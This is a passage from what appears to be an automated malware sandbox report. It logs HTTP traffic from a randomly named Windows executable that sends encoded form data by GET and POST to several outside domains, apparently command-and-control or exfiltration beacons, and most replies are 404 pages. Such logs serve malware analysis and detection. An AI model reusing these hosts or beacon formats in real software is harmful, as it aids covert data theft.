                                                                        Data Ascii: -NnllVvH=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWmrLTfqllvYyFYnbosKOkQGKQ3TrryCkcJs3nw4hr84rUwbqbp+nz3MjobXpg9nZRayDnslpV2MYrHpec0FEQmKmhfGM8QC5zTPrZOUBy7DaUWDbFs+O2YTshIY267Pib+RfLFpYQNKhIb8sa2eJfBaw2A+Axp/vJyss73HsLFHrnqY0a5VQ5Oas3HrXdmBxs6XkHy+w/xsYM+47/DDjQ3uixKKCl5r3W1/c5Bfo7cHOqQXLRAzRqW2rPsHaDNgm8jQ++xrMnsYl3W/R/vj2mNIYxnD1k8mqBk1qcRIQ2qPLkNBc97jN/CnYknIqJfH6EE1EZFqF75NCudq1f1GRkOniOUy3tPLyfPbeORsdTL87iZkiv93QOZrGqRUPoiUdVBYWo0uv1okAgpVCADYoQTr5Wo/ex2FwFJnySXLB1zjfRD6uRvixTFHjmpTW7t8PGP3s6ptGDil0AM2Qp6lQBOXqXZnaqOCQ0SNdlpGtshq3l0r/3qOStmrg7f/GnPqMqKjjqlnRIeQ2R4Yd/jgcL3gZ8MBOQKeimNSeKQN215WoFGMdVjcglEz5c76PHMMsBmqdnAQtBoKpYGVdEpKFIKCpgy6xJ6kXtrl/HDw8YoRRmlV8pv+qEeORZsZVQ+h4utwUQlyoPH3tE7/J0pz/AvAqFlVqoVrbNPRba+kuok7lZxvuxEPxcjnTDmrtJSjYi1m4RBtoWQEPQSJ3V0nnmPu60djR7WQ1gtWdNzwA50rlE+1fYqZt/COqLQQfBFbARSAnodqMrboreadfgrzeS0MocvxoZB5TjzvfIR6UDHdlVjeJCA9nS/zRNASLUqUI+h2+mJCBYUrDEta5cfmrCJl8QZte87+FQ4vcTyvdFrC++KaQd33SAu5p2UgGC31KVKdILrASegVB7QM9k4h+ybWERGjbvTfu8HTQgQOxrQc57BX41Tbg/3B9vvmBnFh5/c [TRUNCATED]
                                                                        Oct 8, 2024 16:35:26.921124935 CEST595INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:26 GMT
                                                                        Server: Apache
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 389
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.45002463.250.47.40802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:28.818638086 CEST553OUTGET /3bdq/?-NnllVvH=mPDvA1qI3GiuntP60bqgVobnrbMnRYp61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exu2k3ruJCpl2j2bvSmTd+X0q2Ansy3FLMFak=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.kexweb.top
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Oct 8, 2024 16:35:29.400230885 CEST610INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:29 GMT
                                                                        Server: Apache
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 389
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.45002591.184.0.200802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:34.452384949 CEST833OUTPOST /ikh0/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.jobworklanka.online
                                                                        Origin: http://www.jobworklanka.online
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.jobworklanka.online/ikh0/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 63 74 66 75 64 76 48 48 58 71 6c 57 47 2f 36 79 52 51 68 64 31 72 4c 32 54 43 2f 47 6a 49 6f 75 77 6e 30 42 37 36 65 65 6f 4f 64 61 35 6e 6c 47 55 39 6b 4d 33 69 4b 44 57 6a 61 49 70 48 63 30 44 79 41 4d 51 57 71 68 4c 6d 6d 4f 6f 4e 6f 6f 67 59 72 64 6a 77 74 51 35 6e 34 62 48 4c 70 71 39 77 48 74 69 68 6c 38 72 6c 78 35 52 63 49 4e 31 4f 33 31 68 69 62 31 6c 44 30 64 48 36 49 63 4f 2b 31 49 63 65 78 49 32 52 51 37 5a 57 54 48 32 50 75 42 47 6e 63 6a 34 55 78 52 44 61 6c 37 2b 63 50 52 74 58 72 76 44 45 67 63 44 36 7a 70 31 71 41 54 41 3d 3d
                                                                        Data Ascii: -NnllVvH=otZcyeHXRsUakctfudvHHXqlWG/6yRQhd1rL2TC/GjIouwn0B76eeoOda5nlGU9kM3iKDWjaIpHc0DyAMQWqhLmmOoNoogYrdjwtQ5n4bHLpq9wHtihl8rlx5RcIN1O31hib1lD0dH6IcO+1IcexI2RQ7ZWTH2PuBGncj4UxRDal7+cPRtXrvDEgcD6zp1qATA==
                                                                        Oct 8, 2024 16:35:35.132344961 CEST500INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:34 GMT
                                                                        Server: Apache
                                                                        X-Xss-Protection: 1; mode=block
                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.45002691.184.0.200802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:36.998725891 CEST853OUTPOST /ikh0/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.jobworklanka.online
                                                                        Origin: http://www.jobworklanka.online
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.jobworklanka.online/ikh0/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 67 6f 76 52 58 30 41 36 36 65 54 49 4f 64 51 5a 6e 67 4c 30 39 37 4d 33 75 43 44 58 50 61 49 70 6a 63 30 44 43 41 4e 6e 69 70 6e 62 6d 6f 56 34 4e 51 6c 41 59 72 64 6a 77 74 51 35 79 6a 62 47 76 70 72 4e 41 48 76 48 4e 6b 32 4c 6c 77 70 78 63 49 66 46 4f 7a 31 68 6a 38 31 6b 65 54 64 42 32 49 63 4d 6d 31 49 4a 72 6e 44 32 51 36 31 35 58 5a 45 6d 72 2b 50 6b 32 72 68 37 41 4b 51 78 75 30 33 59 4e 56 41 63 32 38 39 44 67 54 42 45 7a 48 6b 32 58 4a 49 4a 7a 31 61 57 64 37 65 49 64 58 46 61 66 4b 53 79 41 31 51 77 51 3d
                                                                        Data Ascii: -NnllVvH=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGWgovRX0A66eTIOdQZngL097M3uCDXPaIpjc0DCANnipnbmoV4NQlAYrdjwtQ5yjbGvprNAHvHNk2LlwpxcIfFOz1hj81keTdB2IcMm1IJrnD2Q615XZEmr+Pk2rh7AKQxu03YNVAc289DgTBEzHk2XJIJz1aWd7eIdXFafKSyA1QwQ=
                                                                        Oct 8, 2024 16:35:37.637835026 CEST500INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:37 GMT
                                                                        Server: Apache
                                                                        X-Xss-Protection: 1; mode=block
                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.45002791.184.0.200802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:39.753546953 CEST10935OUTPOST /ikh0/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.jobworklanka.online
                                                                        Origin: http://www.jobworklanka.online
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.jobworklanka.online/ikh0/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 34 6f 76 6a 66 30 41 5a 53 65 63 6f 4f 64 4c 5a 6e 68 4c 30 39 79 4d 7a 43 47 44 58 79 74 49 76 6e 63 79 67 36 41 45 7a 2b 70 70 62 6d 6f 63 59 4e 72 6f 67 59 2b 64 6a 41 70 51 35 69 6a 62 47 76 70 72 4f 59 48 6d 79 68 6b 77 4c 6c 78 35 52 63 45 4e 31 4f 58 31 6c 48 47 31 6b 61 70 63 78 57 49 62 73 32 31 45 62 44 6e 42 57 52 63 32 35 57 4d 45 6d 57 35 50 6b 36 64 68 36 45 67 51 79 79 30 30 76 49 7a 46 76 2b 56 72 31 77 53 44 6b 58 63 6b 45 36 51 4e 49 4f 51 52 57 56 67 49 38 46 58 66 37 79 62 48 67 6b 2b 4d 31 7a 4c 66 65 75 78 32 2f 6b 52 35 69 2f 4a 52 66 77 2b 7a 44 4f 38 62 59 2b 4e 70 55 35 6a 6b 5a 54 56 69 45 32 56 33 31 58 6d 79 65 77 78 36 4a 58 36 61 42 79 72 78 31 30 70 69 63 34 62 43 47 38 48 71 6c 62 57 31 56 30 65 53 36 4e 45 33 67 46 4d 58 48 53 58 62 65 45 46 54 50 50 44 6b 4a 32 70 6d 6d 53 75 50 71 39 76 33 54 72 63 47 39 6b 36 79 [TRUNCATED]
                                                                        Data Ascii: -NnllVvH=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGW4ovjf0AZSecoOdLZnhL09yMzCGDXytIvncyg6AEz+ppbmocYNrogY+djApQ5ijbGvprOYHmyhkwLlx5RcEN1OX1lHG1kapcxWIbs21EbDnBWRc25WMEmW5Pk6dh6EgQyy00vIzFv+Vr1wSDkXckE6QNIOQRWVgI8FXf7ybHgk+M1zLfeux2/kR5i/JRfw+zDO8bY+NpU5jkZTViE2V31Xmyewx6JX6aByrx10pic4bCG8HqlbW1V0eS6NE3gFMXHSXbeEFTPPDkJ2pmmSuPq9v3TrcG9k6y7/zvRmh0e4enPpsIBSDjoKk3erOT56EHMjs8gGo1YKlDN7SkPVZipQuCdSvp/nvemte90OZB1XLFUtBy8OWUTcn4l6cowsSt94oT1c2hmH3Q8rtYAfMc4uh9QZ9dn86sR8YHV+w+wHtlFOXqedOZnT5UGzScIBm8vxqbVbCm3wo29GoH+cocsfLqibj+cFzGfR7ZF6Ji6nF5qPnWzbcMyENkpU2vxavQjhi32LavedADP4ZucC4uwblFgkHoJVJgvb1MdP2Pp4K3nvloHyETmL1WBY+rq0VuDvyl2ypPh1ZcbWIFEt8wwfpolRGaQtlbC1xf8RtCmVz+vuMCJuH0Ouv8Z//Mu/8WyZ0RLKqnyAqLTkzEbe6PMLapOMmsH4AWyfqZ4RnMk1qGlpbK2NDA5LJS7qeN3fprZWtVW8yYugK8izpaEyyEHDGUlJYpV1eVqwou0JS+bCzpyBjBpVYbyuxx8Y1iFG/2lonKgKvykkNV5hW6kgJI+SrJ5QnQ1LLQeiIt4N3g/IMUQz7e1A2z9F4T2lvzvSYznE/HOAoGa2h8H239FgXpAP8d6C1ONHU8Y2eEAWZ3vvww6zA7PLU91OpU7E1pam5j5NkY0Ojf5fo6HwNNz5j9y5IitJkjYd+0a0QkovblLupgpvX+irnP3ZIuT4crgepDqb [TRUNCATED]
                                                                        Oct 8, 2024 16:35:40.493004084 CEST500INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:40 GMT
                                                                        Server: Apache
                                                                        X-Xss-Protection: 1; mode=block
                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.45002891.184.0.200802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:42.287867069 CEST562OUTGET /ikh0/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=lvx8xqKuEeZXr5ITqNCHPh3uOhDJ1jEsZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1vJ6qU/h+jhYmRiU/b4DSTDHjmvsEtFplu6A= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.jobworklanka.online
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Oct 8, 2024 16:35:42.902800083 CEST500INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:42 GMT
                                                                        Server: Apache
                                                                        X-Xss-Protection: 1; mode=block
                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.2.45002913.248.169.48802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:47.947877884 CEST803OUTPOST /h7lb/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.dyme.tech
                                                                        Origin: http://www.dyme.tech
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.dyme.tech/h7lb/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 73 4a 53 4a 62 2f 6b 54 33 48 37 47 37 55 79 74 4a 6e 75 7a 36 55 46 63 34 37 46 54 4d 6f 44 4a 6b 73 59 58 73 48 55 58 49 77 39 50 76 56 31 67 78 38 56 52 5a 53 77 71 6d 7a 76 78 30 45 47 7a 2b 49 51 52 62 73 7a 31 61 4f 77 38 69 4b 6e 4c 74 4e 6f 61 73 77 34 4a 38 59 6d 42 39 4f 34 66 56 49 42 43 2f 30 36 6b 6f 38 2b 69 44 57 46 55 4e 44 54 49 76 4a 64 48 75 39 68 41 47 6e 56 55 6a 54 68 69 57 64 46 46 39 32 50 64 41 79 43 46 6a 63 30 4b 74 39 6c 78 37 44 36 76 47 64 45 61 50 6f 65 77 76 63 59 76 37 5a 73 47 78 45 39 6c 7a 42 55 46 78 51 3d 3d
                                                                        Data Ascii: -NnllVvH=cZnnZ5lw9mVosJSJb/kT3H7G7UytJnuz6UFc47FTMoDJksYXsHUXIw9PvV1gx8VRZSwqmzvx0EGz+IQRbsz1aOw8iKnLtNoasw4J8YmB9O4fVIBC/06ko8+iDWFUNDTIvJdHu9hAGnVUjThiWdFF92PdAyCFjc0Kt9lx7D6vGdEaPoewvcYv7ZsGxE9lzBUFxQ==


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        26192.168.2.45003013.248.169.48802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:50.494606972 CEST823OUTPOST /h7lb/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.dyme.tech
                                                                        Origin: http://www.dyme.tech
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.dyme.tech/h7lb/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
